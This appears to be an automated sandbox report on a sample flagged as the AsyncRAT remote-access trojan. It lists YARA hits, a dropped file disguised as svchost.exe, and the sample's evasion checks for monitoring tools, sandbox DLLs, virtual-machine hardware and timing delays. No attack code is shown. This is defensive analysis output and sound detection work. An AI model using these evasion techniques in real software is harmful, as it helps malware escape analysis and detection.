                        Source: C:\Users\user\Desktop\Lu4421.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file

                        Boot Survival

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM5
                        Source: Yara matchFile source: Lu4421.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                        Queries memory information (via WMI often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.drBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                        Tries to evade debugger and weak emulator (self modifying code)
                        Source: C:\Users\user\Desktop\Lu4421.exeSpecial instruction interceptor: First address: 12129DF instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\Lu4421.exeMemory allocated: 15B625A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeMemory allocated: 15B7C2B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1B1A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 597875Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow / User API: threadDelayed 1351Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWindow / User API: threadDelayed 5560Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow / User API: threadDelayed 9689Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764Thread sleep count: 195 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764Thread sleep count: 185 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764Thread sleep count: 221 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764Thread sleep count: 159 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764Thread sleep count: 121 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 6764Thread sleep count: 135 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7160Thread sleep count: 1351 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7160Thread sleep count: 5560 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -597984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -597875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99546s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99435s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99257s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99142s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -99016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -98906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -98797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exe TID: 7144Thread sleep time: -98688s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5924Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 1376Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 597875Jump to behavior
